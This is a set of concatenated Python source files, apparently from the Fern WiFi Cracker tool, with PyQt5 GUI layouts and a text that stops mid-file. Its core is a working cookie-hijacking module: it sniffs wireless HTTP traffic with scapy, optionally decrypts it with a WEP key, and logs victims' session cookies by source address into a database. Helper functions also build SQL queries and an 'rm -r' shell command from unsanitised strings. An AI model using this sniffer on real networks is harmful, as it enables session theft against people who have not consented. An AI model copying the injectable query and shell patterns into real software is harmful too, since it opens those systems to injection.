def get_key_from_database(mac_address,encryption):
    cracked_key = str()
    upgrade_database()
    sql_code = "select key from keys where mac_address ='%s' and encryption = '%s'"
    connection = sqlite3.connect('key-database/Database.db')
    query = connection.cursor()
    query.execute(sql_code % (mac_address,encryption))
    result = query.fetchall()
    if(result):
        cracked_key = str(result[0][0])
    return(cracked_key)


def is_already_Cracked(mac_address,encryption):
    sql_code = "select key from keys where mac_address ='%s' and encryption = '%s'"
    connection = sqlite3.connect('key-database/Database.db')
    query = connection.cursor()
    query.execute(sql_code % (mac_address,encryption))
    result = query.fetchall()
    if(result):
        return(True)
    return(False)



def fern_database_query(sql_query):
    connection = sqlite3.connect('key-database/Database.db')
    query = connection.cursor()
    query.execute(sql_query)
    output = query.fetchall()
    connection.commit()
    connection.close()
    return(output)

########## GENERIC GLOBAL READ/WRITE FUNCTIONS ###############
#
# Some globally defined functions for write,copy and read tasks
#
def reader(arg):
    read_file = str()
    try:
        open_ = open(arg,'r+')
        read_file = open_.read()
    finally:
        return read_file

def write(arg,arg2):
    open_ = open(arg,'a+')
    open_.write(arg2)
    open_.close()

def remove(arg,arg2):
    subprocess.getstatusoutput('rm -r %s/%s'%(arg,arg2))  #'rm - r /tmp/fern-log/file.log



########## GENERAL SETTINGS FUNCTION #########################


################# MAC Address Validator ######################

def Check_MAC(mac_address):
    hex_digits = re.compile('([0-9a-f]{2}:){5}[0-9a-f]{2}',re.IGNORECASE)
    if re.match(hex_digits,mac_address):
        return(True)
    return(False)


#################   FILE LINE COUNTER ########################

def blocks(files, size=65536):
    '''yields file stream in block sections'''
    while True:
        b = files.read(size)
        if not b: break
        yield b

def line_count(filename):
    '''Returns estimated value of line'''
    count = sum(1 for i in open(filename, "r",encoding="utf-8",errors='ignore'))
    return(count)


def killProcess(processId):
    os.system("kill " + str(processId))

######################## Font settings #######################
def font_size():
	font_settings = open('%s/.font_settings.dat'%(os.getcwd()),'r+')
	font_init = font_settings.read()
	return int(font_init.split()[2])


###################### Process Terminate ######################









#-------------------------------------------------------------------------------
# Name:        Fern_Cookie_Hijacker
# Purpose:     Captures http cookies from wireless networks
#
# Author:      Saviour Emmanuel Ekiko
#
# Created:     14/06/2012
# Copyright:   (c) Fern Wifi Cracker 2012
# Licence:     <GNU GPL v3>
#
#
#-------------------------------------------------------------------------------
# GNU GPL v3 Licence Summary:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import re
import os
import time
import threading
import sqlite3
import logging
import threading

from PyQt5 import QtCore

from scapy.all import *

class Cookie_Hijack_Core(QtCore.QThread):
    cookie_buffer_detected_signal = QtCore.pyqtSignal()
    New_Cookie_Captured_signal = QtCore.pyqtSignal()

    def __init__(self):
        QtCore.QThread.__init__(self)
        self.control = True             # Starts or Stop Thread processes [True = Start,False = Stop]
        self.maximum_threads = 15        # Thread control -> Issue 30 (http://code.google.com/p/fern-wifi-cracker/issues/detail?id=30)
        self.monitor_interface = str()  # Interface to process 802.11 based packets e.g mon0
        self.decryption_key = str()     # Key to decrypt encrypted packets, if exists
        self.cookie_db_jar = object     # SQlite database for holding captured cookies
        self.cookie_db_cursor = object  # Cursor Object
        self.captured_cookie_count = 0  # Holds number of captured cookies

        self.semaphore = threading.BoundedSemaphore(self.maximum_threads)   # Thread control -> Issue 30 (http://code.google.com/p/fern-wifi-cracker/issues/detail?id=30)


    def __del__(self):
        typedef = type(self.cookie_db_jar).__name__
        if(typedef == "Connection"):
            self.cookie_db_jar.close()


    def truncate_database(self):        # Deltes all previous cookie entires from database
        sql_code = "delete from cookie_cache"
        self.cookie_db_cursor.execute(sql_code)
        self.cookie_db_jar.commit()


    def create_cookie_cache(self):      # Creates table cookie_cache for logging captured cookies
        sql_code_a = '''create table if not exists cookie_cache
        (source TEXT,Referer TEXT,Web_Address TEXT,
        Host TEXT,Name TEXT,Value TEXT,
        Dot_Host Text,Path TEXT,
        IsSecured INTEGER,IsHttpOnly INTEGER
        )'''
        sql_code_b = '''create table if not exists cache_settings
        (setting TEXT,value TEXT)'''

        self.cookie_db_cursor.execute(sql_code_a)
        self.cookie_db_cursor.execute(sql_code_b)
        self.cookie_db_jar.commit()


    def insert_cache_settings(self,setting,value):
        sql_code = "insert into cache_settings values (?,?)"
        self.cookie_db_cursor.execute(sql_code ,(setting,value))
        self.cookie_db_jar.commit()



    # Mozilla Cookie entry format
    #
    # ('14', 'scorecardresearch.com', 'UID', '2baec64d-23.63.99.90-1342553308', '.scorecardresearch.com', '/', '1404761306', '1342815702910000', '1342553306190000', '0', '0')
    # (id_number,baseDomain,name,value,host,path,expiry,lastAccessed,creationTime,isSecure,isHttpOnly)
    #

    def insert_Cookie_values(self,source,referer,web_address,host,name,value,dot_host,path,isSecure,isHttpOnly):
        sql_code_a = "select Value from cookie_cache where (source = ? and Web_Address = ? and Name = ?)"
        sql_code_b = "update cookie_cache set Value = ? where (Name = ? and source = ? and Web_Address = ?)"
        sql_code_c = "insert into cookie_cache values (?,?,?,?,?,?,?,?,?,?);"

        if(referer == str()):
            referer = "http://" + web_address

        if(referer.startswith("https://")):
            isSecure = "1"
        else:
            isSecure = "0"

        database_path = os.getcwd() + "/key-database/Cookie.db"
        cookie_db_jar = sqlite3.connect(database_path)

        cookie_db_cursor = cookie_db_jar.cursor()

        cookie_db_cursor.execute(sql_code_a ,(source,web_address,name))
        db_value = cookie_db_cursor.fetchone()
        if(db_value):
            if(db_value[0] != value):
                cookie_db_cursor.execute(sql_code_b ,(value,name,source,web_address))
                cookie_db_jar.commit()
                cookie_db_jar.close()
                return

        cookie_db_cursor.execute(sql_code_c,(source,referer,web_address,host,name,value,dot_host,path,isSecure,isHttpOnly))
        cookie_db_jar.commit()
        cookie_db_jar.close()


    def domain_process(self,domain):    # www.google.com --> .google.com | us.atlanta.google.co.uk --> .google.co.uk
        domain_string = str()
        process = []
        if(domain.startswith("ad.")):
            domain_string = domain
            return(domain)
        seg_domain = domain.split(".")
        seg_domain.reverse()
        for segment in seg_domain:
            if(len(segment) <= 3):
                process.append(segment)
                process.append(".")
            else:
                process.append(segment)
                process.append(".")
                break
        process.reverse()
        for segment in process:
            domain_string  += segment

        return(domain_string)


    def calculate_expiration_time(self):
        return


    def Process_Packet(self,captured_packet):
        self.semaphore.acquire()                        # Thread control -> Issue 30 (http://code.google.com/p/fern-wifi-cracker/issues/detail?id=30)
        try:
            path = r"/"
            expires = ""
            domain = str()
            web_address = str()
            refer_address = str()
            is_secure = str()
            src_addr = captured_packet.getlayer("IP").src       # Source Mac address

            if(self.control):
                self.cookie_buffer_detected_signal.emit()

            packet_captured = captured_packet.load.decode("ascii",errors="ignore")

            if("Cookie:" in packet_captured):

                if("Host:" in packet_captured):
                    http_packets = packet_captured.split("\n")

                    for entries in http_packets:
                        if(re.match("Referer",entries,re.IGNORECASE)):
                            process = entries.strip()
                            refer_address = process.split(":",1)[1]
                            if(refer_address.startswith("https://")):
                                is_secure = "1"
                            else:
                                is_secure = "0"

                        if(re.match("Host",entries,re.IGNORECASE)):
                            process = entries.strip()
                            web_address = process.split(":",1)[1]
                            domain = self.domain_process(web_address)              # www.google.com --> .google.com

                        if(re.match("Cookie",entries,re.IGNORECASE)):
                            process = entries.strip()
                            cookie_collection = process.split(":",1)[1]                        # "c_user=UYt6t6rTRf455ddt5; ID=8776765; env-tye=8927GTFYfYT;"

                            cookie_process = cookie_collection.split(";")

                            for cookie_and_value in cookie_process:
                                if(cookie_and_value):
                                    cookie_process_a = cookie_and_value.strip()
                                    if("=" in cookie_process_a):
                                        name,value = cookie_process_a.split("=",1)

                                        # source,referer,web_address,host,name,value,dot_host,path,isSecure,isHttpOnly
                                        self.insert_Cookie_values(src_addr,refer_address,web_address,domain[1:],name,value,domain,path,is_secure,"0")
                                        self.captured_cookie_count += 1

                    if(self.control):
                        self.New_Cookie_Captured_signal.emit()

        except AttributeError as message:
            pass

        finally:
            self.semaphore.release()                                    # Thread control -> Issue 30 (http://code.google.com/p/fern-wifi-cracker/issues/detail?id=30)



    def Cookie_Capture(self):
        sniff(filter = "tcp and port http or https",iface = self.monitor_interface,prn = self.Process_Packet,store = 0) # Thread worker speeds up packet processing


    def run(self):
        conf.wepkey = self.decryption_key
        self.Cookie_Capture()

































import os

from gui.main_window import font_size
from PyQt5 import QtCore, QtWidgets, QtGui

font_setting = font_size()


try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class Ui_attack_settings(object):
    def setupUi(self, attack_settings):
        attack_settings.setObjectName(_fromUtf8("attack_settings"))
        attack_settings.resize(400, 199)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/mac_address.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        attack_settings.setWindowIcon(icon)
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(attack_settings)
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        self.mac_box = QtWidgets.QGroupBox(attack_settings)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.mac_box.setFont(font)
        self.mac_box.setCheckable(True)
        self.mac_box.setChecked(False)
        self.mac_box.setObjectName(_fromUtf8("mac_box"))
        self.verticalLayout = QtWidgets.QVBoxLayout(self.mac_box)
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.label = QtWidgets.QLabel(self.mac_box)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.verticalLayout.addWidget(self.label)
        spacerItem = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout.addItem(spacerItem)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.mac_edit = QtWidgets.QLineEdit(self.mac_box)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.mac_edit.setFont(font)
        self.mac_edit.setObjectName(_fromUtf8("mac_edit"))
        self.horizontalLayout.addWidget(self.mac_edit)
        spacerItem1 = QtWidgets.QSpacerItem(22, 21, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.mac_button = QtWidgets.QPushButton(self.mac_box)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.mac_button.setFont(font)
        self.mac_button.setObjectName(_fromUtf8("mac_button"))
        self.horizontalLayout.addWidget(self.mac_button)
        self.verticalLayout.addLayout(self.horizontalLayout)
        self.verticalLayout_3.addWidget(self.mac_box)
        self.capture_box = QtWidgets.QGroupBox(attack_settings)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.capture_box.setFont(font)
        self.capture_box.setCheckable(True)
        self.capture_box.setChecked(False)
        self.capture_box.setObjectName(_fromUtf8("capture_box"))
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.capture_box)
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.label_2 = QtWidgets.QLabel(self.capture_box)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.verticalLayout_2.addWidget(self.label_2)
        spacerItem2 = QtWidgets.QSpacerItem(20, 1, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_2.addItem(spacerItem2)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.directory_label = QtWidgets.QLabel(self.capture_box)
        self.directory_label.setObjectName(_fromUtf8("directory_label"))
        self.horizontalLayout_2.addWidget(self.directory_label)
        spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem3)
        self.direc_browse = QtWidgets.QPushButton(self.capture_box)
        self.direc_browse.setObjectName(_fromUtf8("direc_browse"))
        self.horizontalLayout_2.addWidget(self.direc_browse)
        self.verticalLayout_2.addLayout(self.horizontalLayout_2)
        self.verticalLayout_3.addWidget(self.capture_box)

        self.retranslateUi(attack_settings)
        QtCore.QMetaObject.connectSlotsByName(attack_settings)

    def retranslateUi(self, attack_settings):
        attack_settings.setWindowTitle(QtWidgets.QApplication.translate("attack_settings", "WIFI Attack Settings", None, 0))
        self.mac_box.setTitle(QtWidgets.QApplication.translate("attack_settings", "Default MAC Settings", None, 0))
        self.label.setText(QtWidgets.QApplication.translate("attack_settings", "Set default MAC address to be used when attempting WIFI  attacks", None, 0))
        self.mac_button.setText(QtWidgets.QApplication.translate("attack_settings", "Set MAC", None, 0))
        self.capture_box.setTitle(QtWidgets.QApplication.translate("attack_settings", "Capture File Settings", None, 0))
        self.label_2.setText(QtWidgets.QApplication.translate("attack_settings", "Set Directory for storing capture files for offline usage", None, 0))
        self.directory_label.setText(QtWidgets.QApplication.translate("attack_settings", "", None, 0))
        self.direc_browse.setText(QtWidgets.QApplication.translate("attack_settings", "Browse", None, 0))




import os
from gui.main_window import font_size
from PyQt5 import QtCore, QtWidgets, QtGui

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

font_setting = font_size()

class database_ui(object):
    def setupUi(self, database):
        database.setObjectName(_fromUtf8("database"))
        database.resize(556, 290)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/Database-64.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        database.setWindowIcon(icon)
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(database)
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.label = QtWidgets.QLabel(database)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label.setFont(font)
        self.label.setObjectName(_fromUtf8("label"))
        self.verticalLayout.addWidget(self.label)
        self.label_2 = QtWidgets.QLabel(database)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label_2.setFont(font)
        self.label_2.setObjectName(_fromUtf8("label_2"))
        self.verticalLayout.addWidget(self.label_2)
        self.verticalLayout_2.addLayout(self.verticalLayout)
        spacerItem = QtWidgets.QSpacerItem(20, 5, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_2.addItem(spacerItem)
        self.key_table = QtWidgets.QTableWidget(database)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.key_table.setFont(font)
        self.key_table.setObjectName(_fromUtf8("key_table"))
        self.key_table.setColumnCount(5)
        self.key_table.setRowCount(0)
        icon1 = QtGui.QIcon()
        icon1.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/router-icone-7671-128.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        item = QtWidgets.QTableWidgetItem()
        self.key_table.setHorizontalHeaderItem(0, item)
        item.setIcon(icon1)
        icon2 = QtGui.QIcon()
        icon2.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/mac_address.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        item = QtWidgets.QTableWidgetItem()
        self.key_table.setHorizontalHeaderItem(1, item)
        item.setIcon(icon2)
        icon3 = QtGui.QIcon()
        icon3.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/binary.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        item = QtWidgets.QTableWidgetItem()
        self.key_table.setHorizontalHeaderItem(2, item)
        item.setIcon(icon3)
        icon4 = QtGui.QIcon()
        icon4.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/login_128.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        item = QtWidgets.QTableWidgetItem()
        self.key_table.setHorizontalHeaderItem(3, item)
        item.setIcon(icon4)
        icon5 = QtGui.QIcon()
        icon5.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/wifi_5.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        item = QtWidgets.QTableWidgetItem()
        self.key_table.setHorizontalHeaderItem(4, item)
        item.setIcon(icon5)
        self.verticalLayout_2.addWidget(self.key_table)
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.save_button = QtWidgets.QPushButton(database)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.save_button.sizePolicy().hasHeightForWidth())
        self.save_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.save_button.setFont(font)
        self.save_button.setObjectName(_fromUtf8("save_button"))
        self.horizontalLayout.addWidget(self.save_button)
        spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.insert_button = QtWidgets.QPushButton(database)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.insert_button.sizePolicy().hasHeightForWidth())
        self.insert_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.insert_button.setFont(font)
        self.insert_button.setObjectName(_fromUtf8("insert_button"))
        self.horizontalLayout.addWidget(self.insert_button)
        spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem2)
        self.delete_button = QtWidgets.QPushButton(database)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.delete_button.sizePolicy().hasHeightForWidth())
        self.delete_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.delete_button.setFont(font)
        self.delete_button.setObjectName(_fromUtf8("delete_button"))
        self.horizontalLayout.addWidget(self.delete_button)
        spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.horizontalLayout.addItem(spacerItem3)
        self.verticalLayout_2.addLayout(self.horizontalLayout)

        self.retranslateUi(database)
        QtCore.QMetaObject.connectSlotsByName(database)

    def retranslateUi(self, database):
        database.setWindowTitle(QtWidgets.QApplication.translate("database", "Fern - Key Database", None, 0))
        self.label.setText(QtWidgets.QApplication.translate("database", "Decrypted wireless keys are automatically added to the sqlite database after a successful", None, 0))
        self.label_2.setText(QtWidgets.QApplication.translate("database", "attack, Alternatively you can insert keys to the database manually", None, 0))
        self.key_table.horizontalHeaderItem(0).setText(QtWidgets.QApplication.translate("database", "Access Point", None, 0))
        self.key_table.horizontalHeaderItem(1).setText(QtWidgets.QApplication.translate("database", "Mac Address", None, 0))
        self.key_table.horizontalHeaderItem(2).setText(QtWidgets.QApplication.translate("database", "Encryption", None, 0))
        self.key_table.horizontalHeaderItem(3).setText(QtWidgets.QApplication.translate("database", "Key", None, 0))
        self.key_table.horizontalHeaderItem(4).setText(QtWidgets.QApplication.translate("database", "Channel", None, 0))
        self.save_button.setText(QtWidgets.QApplication.translate("database", "Save Changes", None, 0))
        self.insert_button.setText(QtWidgets.QApplication.translate("database", "Insert New Key", None, 0))
        self.delete_button.setText(QtWidgets.QApplication.translate("database", "Delete", None, 0))




import os
import sys
import subprocess
from PyQt5 import QtCore, QtWidgets, QtGui


#
# Create default font setting
#
if '.font_settings.dat' not in os.listdir(os.getcwd()):
    default_font = open('%s/.font_settings.dat'%(os.getcwd()),'a+')
    default_font.write('font_size = 7')
    default_font.close()

def font_size():
	font_settings = open('%s/.font_settings.dat'%(os.getcwd()),'r+')
	font_init = font_settings.read()
	return int(font_init.split()[2])

font_setting = font_size()

try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class Ui_Dialog(object):
    def setupUi(self, Dialog):
        Dialog.setObjectName(_fromUtf8("Dialog"))
        Dialog.resize(619, 623)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth())
        Dialog.setSizePolicy(sizePolicy)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/icon.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        Dialog.setWindowIcon(icon)
        self.verticalLayout_30 = QtWidgets.QVBoxLayout(Dialog)
        self.verticalLayout_30.setObjectName(_fromUtf8("verticalLayout_30"))
        self.verticalLayout_29 = QtWidgets.QVBoxLayout()
        self.verticalLayout_29.setSpacing(6)
        self.verticalLayout_29.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)
        self.verticalLayout_29.setObjectName(_fromUtf8("verticalLayout_29"))
        self.horizontalLayout_7 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_7.setSizeConstraint(QtWidgets.QLayout.SetFixedSize)
        self.horizontalLayout_7.setObjectName(_fromUtf8("horizontalLayout_7"))
        self.verticalLayout_28 = QtWidgets.QVBoxLayout()
        self.verticalLayout_28.setObjectName(_fromUtf8("verticalLayout_28"))
        self.verticalLayout_26 = QtWidgets.QVBoxLayout()
        self.verticalLayout_26.setObjectName(_fromUtf8("verticalLayout_26"))
        self.label_14 = QtWidgets.QLabel(Dialog)
        self.label_14.setText(_fromUtf8(""))
        self.label_14.setPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/splash.png"%(os.getcwd()))))
        self.label_14.setObjectName(_fromUtf8("label_14"))
        self.verticalLayout_26.addWidget(self.label_14)
        spacerItem = QtWidgets.QSpacerItem(20, 17, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_26.addItem(spacerItem)
        self.verticalLayout_24 = QtWidgets.QVBoxLayout()
        self.verticalLayout_24.setObjectName(_fromUtf8("verticalLayout_24"))
        self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
        spacerItem1 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_3.addItem(spacerItem1)
        self.update_label = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.update_label.sizePolicy().hasHeightForWidth())
        self.update_label.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.update_label.setFont(font)
        self.update_label.setObjectName(_fromUtf8("update_label"))
        self.horizontalLayout_3.addWidget(self.update_label)
        self.verticalLayout_24.addLayout(self.horizontalLayout_3)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem2 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem2)
        self.verticalLayout_22 = QtWidgets.QVBoxLayout()
        self.verticalLayout_22.setObjectName(_fromUtf8("verticalLayout_22"))
#        self.update_button = QtWidgets.QPushButton(Dialog)
#        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
#        sizePolicy.setHorizontalStretch(0)
#        sizePolicy.setVerticalStretch(0)
#        sizePolicy.setHeightForWidth(self.update_button.sizePolicy().hasHeightForWidth())
#        self.update_button.setSizePolicy(sizePolicy)
#        font = QtGui.QFont()
#        font.setPointSize(font_setting)
#        self.update_button.setFont(font)
#        self.update_button.setText(_fromUtf8(""))
#        icon1 = QtGui.QIcon()
#        icon1.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/1295008956_system-software-update.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
#        self.update_button.setIcon(icon1)
#        self.update_button.setIconSize(QtCore.QSize(35, 34))
#        self.update_button.setObjectName(_fromUtf8("update_button"))
#        self.verticalLayout_22.addWidget(self.update_button)
        spacerItem3 = QtWidgets.QSpacerItem(13, 30, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_22.addItem(spacerItem3)
        self.horizontalLayout.addLayout(self.verticalLayout_22)
        spacerItem4 = QtWidgets.QSpacerItem(13, 74, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout.addItem(spacerItem4)
        self.horizontalLayout_2.addLayout(self.horizontalLayout)
        spacerItem5 = QtWidgets.QSpacerItem(124, 12, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem5)
        self.verticalLayout_24.addLayout(self.horizontalLayout_2)
        self.verticalLayout_26.addLayout(self.verticalLayout_24)
        self.verticalLayout_28.addLayout(self.verticalLayout_26)
        self.verticalLayout_23 = QtWidgets.QVBoxLayout()
        self.verticalLayout_23.setObjectName(_fromUtf8("verticalLayout_23"))
        self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        spacerItem6 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_6.addItem(spacerItem6)
        self.verticalLayout_21 = QtWidgets.QVBoxLayout()
        self.verticalLayout_21.setContentsMargins(0, -1, -1, -1)
        self.verticalLayout_21.setObjectName(_fromUtf8("verticalLayout_21"))
        self.py_version_label = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.py_version_label.sizePolicy().hasHeightForWidth())
        self.py_version_label.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.py_version_label.setFont(font)
        self.py_version_label.setObjectName(_fromUtf8("py_version_label"))
        self.verticalLayout_21.addWidget(self.py_version_label)
        self.air_version = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.air_version.sizePolicy().hasHeightForWidth())
        self.air_version.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.air_version.setFont(font)
        self.air_version.setObjectName(_fromUtf8("air_version"))
        self.verticalLayout_21.addWidget(self.air_version)
        self.qt_version = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.qt_version.sizePolicy().hasHeightForWidth())
        self.qt_version.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.qt_version.setFont(font)
        self.qt_version.setObjectName(_fromUtf8("qt_version"))
        self.verticalLayout_21.addWidget(self.qt_version)
        self.horizontalLayout_6.addLayout(self.verticalLayout_21)
        self.verticalLayout_23.addLayout(self.horizontalLayout_6)
        spacerItem7 = QtWidgets.QSpacerItem(20, 37, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_23.addItem(spacerItem7)
        self.verticalLayout_28.addLayout(self.verticalLayout_23)
        self.horizontalLayout_7.addLayout(self.verticalLayout_28)
        self.verticalLayout_25 = QtWidgets.QVBoxLayout()
        self.verticalLayout_25.setObjectName(_fromUtf8("verticalLayout_25"))
        self.verticalLayout_27 = QtWidgets.QVBoxLayout()
        self.verticalLayout_27.setObjectName(_fromUtf8("verticalLayout_27"))
        self.verticalLayout_20 = QtWidgets.QVBoxLayout()
        self.verticalLayout_20.setSpacing(6)
